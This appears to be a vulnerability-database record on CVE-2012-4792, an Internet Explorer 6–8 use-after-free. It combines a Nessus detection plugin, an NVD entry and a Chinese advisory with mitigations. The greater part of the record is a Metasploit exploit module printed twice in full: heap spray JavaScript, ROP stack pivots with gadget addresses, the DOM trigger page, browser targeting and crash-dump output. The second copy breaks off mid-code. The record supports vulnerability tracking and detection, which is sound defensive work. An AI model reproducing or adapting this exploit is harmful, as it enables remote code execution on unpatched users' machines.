{"type": "zdt", "idList": ["1337DAY-ID-20069"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"]}, {"type": "cert", "idList": ["VU:154201"]}, {"type": "thn", "idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"]}], "modified": "2019-11-03T12:15:46"}, "score": {"value": 9.6, "vector": "NONE", "modified": "2019-11-03T12:15:46"}, "vulnersScore": 9.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "63522", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.", "modified": "2019-02-26T14:04:00", "id": "CVE-2012-4792", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792", "published": "2012-12-30T18:55:00", "title": "CVE-2012-4792", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:47:20", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 57070\r\nCVE(CAN) ID: CVE-2012-4792\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nInternet Explorer\u5728mshtml!CDwnBindInfo\u5bf9\u8c61\u7684\u5904\u7406\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\u6076\u610f\u7f51\u9875\u5185\u5bb9\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n\u6b64\u6f0f\u6d1e\u662f0day\u6f0f\u6d1e\uff0c\u76ee\u524d\u5df2\u88ab\u53d1\u73b0\u7528\u4e8e\u6267\u884c\u9488\u5bf9\u6027\u7684\u653b\u51fb\u3002\r\n\r\n\u4e0d\u53d7\u5f71\u54cd\u7cfb\u7edf\uff1a\r\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 10.x\n0\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u5728\u5382\u5546\u8865\u4e01\u53d1\u5e03\u4e4b\u524d\uff0c\u6211\u4eec\u5efa\u8bae\u7528\u6237\u6682\u65f6\u6539\u7528\u975eIE\u5185\u6838\u6d4f\u89c8\u5668\uff0c\u5982Firefox\u3001Chrome\u3002\r\n\r\n* \u5347\u7ea7IE\u5230\u7248\u672c9\u621610\uff0c\u56e0\u4e3a\u8fd9\u4e24\u4e2a\u7248\u672c\u7684IE\u4e0d\u53d7\u6b64\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n* \u5bf9\u4e8eIE 6\u30017\u30018\u7248\u672c\u6d4f\u89c8\u5668\u53ef\u4ee5\u91c7\u7528\u5982\u4e0b\u9632\u62a4\u63aa\u65bd:\r\n\r\n \u91c7\u7528\u5382\u5546\u63d0\u4f9b\u7684Enhanced Mitigation Experience Toolkit (EMET)\u5de5\u5177\u3002\u6b64\u65b9\u6cd5\u80fd\u6709\u6548\u9632\u8303\uff0c\u4e14\u4e0d\u5f71\u54cd\u6b63\u5e38\u7f51\u7ad9\u7684\u8bbf\u95ee\u3002\r\n \r\n \u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff08EMET\uff09\u662f\u4e00\u4e2a\u5b9e\u7528\u5de5\u5177\uff0c\u7528\u4e8e\u9632\u6b62\u8f6f\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u88ab\u6210\u529f\u5229\u7528\u3002\r\n \u4ece\u5982\u4e0b\u7f51\u5740\u4e0b\u8f7d\u589e\u5f3a\u7f13\u89e3\u4f53\u9a8c\u5de5\u5177\u5305\uff1a\r\n http://go.microsoft.com/fwlink/?LinkID=200220&amp;clcid=0x409\r\n \r\n \u5b89\u88c5\u4ee5\u540e\u8fd0\u884c\uff0c\u5728\u754c\u9762\u4e2d\u70b9\u51fb\u201cConfigure Apps\u201d\uff0c\u5728\u5bf9\u8bdd\u6846\u4e2d\u70b9\u51fb\u201cAdd\u201d\uff0c\u6d4f\u89c8\u5230IE\u6240\u5728\u7684\u5b89\u88c5\u76ee\u5f55\uff08\u901a\u5e38\u662fc:\\program files\\Internet Explorer\\\uff09\u9009\u62e9 iexplore.exe\uff0c\u70b9\u51fb\u201c\u6253\u5f00\u201d\uff0c IE\u5c31\u88ab\u52a0\u5165\u5230\u53d7\u4fdd\u62a4\u9879\u76ee\u5217\u8868\u4e2d\uff0c\u70b9\u51fb\u201cOK\u201d\uff0c\u5982\u679c\u6709IE\u6b63\u5728\u8fd0\u884c\u7684\u8bdd\u9700\u8981\u91cd\u542f\u4e00\u4e0b\u5e94\u7528\u3002\r\n\r\n \u4e5f\u53ef\u91c7\u7528\u7c7b\u4f3c\u7684\u64cd\u4f5c\u628a\u5176\u4ed6\u7684\u5e94\u7528\u7a0b\u5e8f\u52a0\u5165\u4fdd\u62a4\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u4f46\u5df2\u7ecf\u53d1\u5e03\u4e86\u9488\u5bf9\u6b64\u6f0f\u6d1e\u7684\u516c\u544a\uff0c\u5efa\u8bae\u7528\u6237\u91c7\u7528\u5382\u5546\u63a8\u8350\u7684\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\u5904\u7406\uff1a\r\n\r\nhttp://technet.microsoft.com/en-us/security/advisory/2794220", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60551", "id": "SSV:60551", "title": "Microsoft Internet Explorer 6/7/8 mshtml!CDwnBindInfo\u5bf9\u8c61\u91ca\u653e\u540e\u91cd\u7528\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "packetstorm": [{"lastseen": "2016-12-05T22:21:02", "bulletinFamily": "exploit", "description": "", "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "href": "https://packetstormsecurity.com/files/119186/Microsoft-Internet-Explorer-CButton-Object-Use-After-Free.html", "id": "PACKETSTORM:119186", "type": "packetstorm", "title": "Microsoft Internet Explorer CButton Object Use-After-Free", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) \n \n# Land the payload at 0x0c0c0b30 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n=begin \nStack Pivoting to eax: \n0:008> db eax \n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ \n=end \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nif t.name =~ /Windows XP/ \nstack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret \nstack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) \nelse \nstack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret \nstack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) \nend \nelse \nprint_status(\"Using JRE ROP\") \nstack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret \nstack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret \nstack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \n \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \nhtml = %Q| \n<!doctype html> \n<html> \n<head> \n<script> \n#{js} \n \nfunction helloWorld() \n{ \nvar e0 = null; \nvar e1 = null; \nvar e2 = null; \n \ntry { \ne0 = document.getElementById(\"a\"); \ne1 = document.getElementById(\"b\"); \ne2 = document.createElement(\"q\"); \ne1.applyElement(e2); \ne1.appendChild(document.createElement('button')); \ne1.applyElement(e0); \ne2.outerText = \"\"; \ne2.appendChild(document.createElement('body')); \n} catch(e) { } \nCollectGarbage(); \nvar eip = window; \nvar data = \"#{Rex::Text.rand_text_alpha(41)}\"; \neip.location = unescape(\"%u0b30%u0c0c\" + data); \n} \n \n</script> \n</head> \n<body onload=\"eval(helloWorld())\"> \n<form id=\"a\"> \n</form> \n<dfn id=\"b\"> \n</dfn> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n \n \n=begin \n(87c.f40): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? \n0:008> k \nChildEBP RetAddr \n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 \n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 \n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f \n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 \n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb \n020bfd78 7e418734 mshtml!GlobalWndProc+0x183 \n020bfda4 7e418816 USER32!InternalCallWinProc+0x28 \n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 \n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 \n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf \n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 \n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 \n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab \n020bffec 00000000 kernel32!BaseThreadStart+0x37 \n \n0:008> r \neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 \neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 \nmshtml!CMarkup::OnLoadStatusDone+0x504: \n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? \n \n=end`\n", "sourceHref": "https://packetstormsecurity.com/files/download/119186/ie_cbutton_uaf.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:52", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "PACKETSTORM:119168", "href": "https://packetstormsecurity.com/files/119168/Microsoft-Internet-Explorer-CDwnBindInfo-Object-Use-After-Free.html", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Microsoft Internet Explorer. A \nuse-after-free condition occurs when a CButton object is freed, but a reference \nis kept and used again during a page reload, an invalid memory that's controllable \nis used, and allows arbitrary code execution under the context of the user. \n \nPlease note: This vulnerability has been exploited in the wild targeting \nmainly China/Taiwan/and US-based computers. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'eromang', \n'mahmud ab rahman', \n'juan vazquez', \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-4792' ], \n[ 'US-CERT-VU', '154201' ], \n[ 'BID', '57070' ], \n[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], \n[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], \n[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], \n[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], \n[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] \n], \n'Payload' => \n{ \n'Space' => 980, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 \n], \n'Privileged' => false, \n'DisclosureDate' => \"Dec 27 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '5.2' \nos_name = 'Windows Server 2003' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nelse \n# OS not supported \nreturn nil \nend \n \ntargets.each do |t| 